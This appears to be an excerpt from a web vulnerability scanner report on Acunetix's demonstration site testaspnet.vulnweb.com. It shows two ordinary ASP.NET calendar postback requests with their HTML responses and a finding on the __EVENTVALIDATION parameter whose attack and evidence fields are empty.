Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8257&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAvkRjetoIZGRkJjj3df1rh9pfswahDREwyzdN220%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKy3o6cBAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DsnfswzIpe%2BOi1pN6%2FHX4TEWIrYM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:12 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAvkRjetoIZGRkJjj3df1rh9pfswahDREwyzdN220=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKy3o6cBAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DsnfswzIpe+Oi1pN6/HX4TEWIrYM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:White" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8136&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAwjhOG9oIZGRkTQdzJ7ezFXYcgIB2FtDFpHmeefU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKy5KiaBwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOp2w3RcSUJZtPDk9DJc9aq%2BQETX
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:32 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAwjhOG9oIZGRkTQdzJ7ezFXYcgIB2FtDFpHmeefU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKy5KiaBwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOp2w3RcSUJZtPDk9DJc9aq+QETX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:White" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
